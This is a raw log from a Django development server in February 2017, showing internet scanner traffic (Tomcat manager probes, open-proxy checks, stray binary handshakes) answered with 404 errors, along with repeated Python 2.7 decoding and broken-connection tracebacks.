  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xb4 in position 5: ordinal not in range(128)
[02/Feb/2017 02:02:58] code 400, message Bad request syntax ('\x05\x02\x00\x02')
[02/Feb/2017 02:02:58] " " 400 -
[02/Feb/2017 02:58:07] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[02/Feb/2017 02:58:27] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%\xe0\x00\x00\x00\x00\x00Cookie:')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 281, in parse_request
    "Bad HTTP/0.9 request type (%r)" % command)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[02/Feb/2017 03:33:31] "GET /manager/html HTTP/1.1" 404 2041
[02/Feb/2017 04:04:52] "GET /robots.txt HTTP/1.1" 404 2036
[02/Feb/2017 04:04:56] "GET / HTTP/1.1" 404 2006
[02/Feb/2017 04:13:37] "GET /manager/html HTTP/1.1" 404 2041
[02/Feb/2017 08:00:39] "GET /manager/html HTTP/1.1" 404 2041
[02/Feb/2017 08:45:00] "GET /manager/html HTTP/1.1" 404 2041
[02/Feb/2017 09:34:43] "GET http://www.baidu.com/?rands=_103602436868600212711078496 HTTP/1.0" 404 1687
[02/Feb/2017 09:34:44] "GET http://23.251.55.38/index.html?rands=_1332050437225873923428880 HTTP/1.0" 404 1711
[02/Feb/2017 09:42:41] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[02/Feb/2017 11:28:32] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[02/Feb/2017 15:10:41] "GET /manager/html HTTP/1.1" 404 2041
[02/Feb/2017 15:13:36] "GET /recordings/index.php HTTP/1.1" 404 2065
[02/Feb/2017 15:22:49] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[02/Feb/2017 17:50:33] code 400, message Bad request syntax ('\xa7\x02\x00\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xa7 in position 1: ordinal not in range(128)
[02/Feb/2017 18:00:53] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[02/Feb/2017 18:41:01] "GET http://www.baidu.com/?rands=_111290032030191287590828 HTTP/1.0" 404 1684
[02/Feb/2017 18:41:01] "GET http://23.251.55.38/index.html?rands=_131119505501384985427836 HTTP/1.0" 404 1710
[02/Feb/2017 21:25:04] "GET /manager/html HTTP/1.1" 404 2041
[02/Feb/2017 22:13:24] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[02/Feb/2017 23:23:02] "GET /robots.txt HTTP/1.1" 404 2040
[02/Feb/2017 23:23:07] "GET / HTTP/1.1" 404 2010
[02/Feb/2017 23:27:23] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[02/Feb/2017 23:33:44] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[02/Feb/2017 23:37:37] "GET / HTTP/1.1" 404 2000
[03/Feb/2017 00:18:22] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 00:48:03] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[03/Feb/2017 00:48:03] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[03/Feb/2017 02:13:12] "HEAD / HTTP/1.0" 404 0
[03/Feb/2017 03:44:46] "GET http://www.baidu.com/?rands=_1755043494030762182232720 HTTP/1.0" 404 1685
[03/Feb/2017 03:44:50] "GET http://23.251.55.38/index.html?rands=_104941068216499968020090700 HTTP/1.0" 404 1713
[03/Feb/2017 05:32:26] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 05:43:52] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 06:34:14] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 08:44:26] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 09:02:02] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 10:07:40] "GET http://www.ip.cn/?rands=_10072113722615456423410496 HTTP/1.0" 404 1670
[03/Feb/2017 10:07:40] "GET http://m.sogou.com/?rands=_939692982221697203351448 HTTP/1.0" 404 1676
[03/Feb/2017 10:07:40] "GET http://www.baidu.com/?rands=_115326231245625453550280 HTTP/1.0" 404 1684
[03/Feb/2017 11:19:32] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[03/Feb/2017 11:47:12] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[03/Feb/2017 11:59:02] "GET / HTTP/1.1" 404 2005
[03/Feb/2017 12:05:43] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 12:59:35] "GET http://www.baidu.com/?rands=_100944807923034086103240 HTTP/1.0" 404 1684
[03/Feb/2017 12:59:35] "GET http://23.251.55.38/index.html?rands=_2337617738201755004269824 HTTP/1.0" 404 1711
[03/Feb/2017 13:18:52] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 13:24:09] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 13:59:51] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 15:02:59] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 17:03:37] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 17:24:44] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[03/Feb/2017 19:08:13] "GET /manager/html HTTP/1.1" 404 2041
[03/Feb/2017 20:03:21] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[03/Feb/2017 22:16:15] "GET http://www.baidu.com/?rands=_171217403124294506310656 HTTP/1.0" 404 1684
[03/Feb/2017 22:16:16] "GET http://23.251.55.38/index.html?rands=_1151597377630015302221020 HTTP/1.0" 404 1711
[04/Feb/2017 00:34:37] "GET /robots.txt HTTP/1.1" 404 2036
[04/Feb/2017 00:34:41] "GET / HTTP/1.1" 404 2006
[04/Feb/2017 00:48:58] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[04/Feb/2017 02:03:06] "GET /manager/html HTTP/1.1" 404 2041
[04/Feb/2017 03:37:25] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[04/Feb/2017 04:38:58] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[04/Feb/2017 07:21:02] "GET http://www.baidu.com/?rands=_1876281102613452484662376 HTTP/1.0" 404 1685
[04/Feb/2017 07:21:03] "GET http://23.251.55.38/index.html?rands=_620011150287729951577152 HTTP/1.0" 404 1710
[04/Feb/2017 12:20:44] "GET / HTTP/1.1" 404 2002
[04/Feb/2017 12:23:44] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[04/Feb/2017 12:50:41] "GET /manager/html HTTP/1.1" 404 2041
[04/Feb/2017 13:33:31] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[04/Feb/2017 13:38:37] "GET / HTTP/1.0" 404 2005
[04/Feb/2017 14:47:11] "GET /manager/html HTTP/1.1" 404 2041
[04/Feb/2017 14:58:57] "GET /script HTTP/1.1" 404 2023
[04/Feb/2017 16:23:48] "GET http://www.baidu.com/?rands=_532016674706953043219484 HTTP/1.0" 404 1684
[04/Feb/2017 16:23:48] "GET http://23.251.55.38/index.html?rands=_26868812526524115258400 HTTP/1.0" 404 1709
[04/Feb/2017 17:32:50] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[04/Feb/2017 19:06:13] "GET / HTTP/1.1" 404 2001
[04/Feb/2017 20:13:06] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[04/Feb/2017 20:13:06] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
-
Exception happened during processing of request from ('185.40.4.46', 51208)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('204.93.154.208', 43414)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('141.8.142.30', 44883)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('141.8.142.57', 65200)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('130.193.37.14', 45534)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('71.6.167.142', 51548)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('180.97.106.162', 39456)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 38372)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('198.20.69.98', 41702)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('104.152.52.64', 46051)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('211.153.34.40', 58530)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('66.240.192.138', 46882)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('130.193.50.33', 39481)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('130.193.50.33', 39679)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('71.6.135.131', 56871)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('180.97.106.161', 33947)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 35880)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 43513)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('185.40.4.37', 36700)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 32827)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('180.97.106.37', 5590)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('89.163.210.108', 46772)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('89.163.210.108', 60410)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('198.20.70.114', 54237)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 52988)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 50997)
--------------------------------[05/Feb/2017 00:35:01] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[05/Feb/2017 00:51:57] "GET /recordings/ HTTP/1.1" 404 2038
[05/Feb/2017 00:51:57] code 400, message Bad request version ('\xe4\xd4\x90\x97\\\x00\x00.\xc0+\xc0/\x00\x9e\x00\x9c\xc0')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 253, in parse_request
    self.send_error(400, "Bad request version (%r)" % version)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0x8c in position 5: ordinal not in range(128)
[05/Feb/2017 01:19:46] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[05/Feb/2017 01:22:04] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[05/Feb/2017 01:24:52] "GET http://www.baidu.com/?rands=_25119177537612075481201696 HTTP/1.0" 404 1686
[05/Feb/2017 01:24:52] "GET http://23.251.55.38/index.html?rands=_9264156198430287527783480 HTTP/1.0" 404 1711
[05/Feb/2017 03:02:15] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[05/Feb/2017 03:02:15] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[05/Feb/2017 04:29:30] "GET http://baidu.com/ HTTP/1.1" 404 1636
[05/Feb/2017 04:29:33] code 400, message Bad request syntax ('\x04\x01\x00\x00\x00\x00\x00\x00\x00')
[05/Feb/2017 04:29:33] "       " 400 -
[05/Feb/2017 04:29:36] code 400, message Bad request syntax ('\x05\x03\x00\x01\x02')
[05/Feb/2017 04:29:36] " " 400 -
[05/Feb/2017 05:39:26] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[05/Feb/2017 10:22:12] "GET http://www.baidu.com/?rands=_26088174592833107586934800 HTTP/1.0" 404 1686
[05/Feb/2017 10:22:12] "GET http://23.251.55.38/index.html?rands=_85569678401122165962472 HTTP/1.0" 404 1709
[05/Feb/2017 11:13:29] "GET /manager/html HTTP/1.1" 404 2041
[05/Feb/2017 11:37:34] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[05/Feb/2017 11:56:33] "GET / HTTP/1.1" 404 2003
[05/Feb/2017 12:04:36] "GET / HTTP/1.0" 404 2001
[05/Feb/2017 12:32:24] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[05/Feb/2017 12:35:36] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[05/Feb/2017 12:42:30] "GET / HTTP/1.1" 404 2000
[05/Feb/2017 14:28:12] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[05/Feb/2017 17:44:56] "GET /manager/html HTTP/1.1" 404 2041
[05/Feb/2017 19:12:07] "GET / HTTP/1.0" 404 2001
[05/Feb/2017 19:13:56] "GET / HTTP/1.0" 404 2001
[05/Feb/2017 19:13:56] "GET / HTTP/1.1" 404 2000
[05/Feb/2017 19:24:29] "GET http://www.baidu.com/?rands=_100209185602728935855960 HTTP/1.0" 404 1684
[05/Feb/2017 19:24:31] "GET http://23.251.55.38/index.html?rands=_20944650592103569009398760 HTTP/1.0" 404 1712
[06/Feb/2017 01:07:44] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[06/Feb/2017 02:57:55] "GET /robots.txt HTTP/1.1" 404 2036
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[06/Feb/2017 02:57:55] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[06/Feb/2017 02:57:59] "GET / HTTP/1.1" 404 2006
[06/Feb/2017 05:32:35] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[06/Feb/2017 05:32:35] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[06/Feb/2017 06:27:22] "GET http://www.baidu.com/?rands=_358856106874763906048 HTTP/1.0" 404 1681
[06/Feb/2017 06:27:22] "GET http://23.251.55.38/index.html?rands=_1666055384016858563416780 HTTP/1.0" 404 1711
[06/Feb/2017 08:29:34] "GET /robots.txt HTTP/1.1" 404 2040
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[06/Feb/2017 08:29:34] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[06/Feb/2017 08:29:39] "GET / HTTP/1.1" 404 2010
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[06/Feb/2017 08:29:39] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
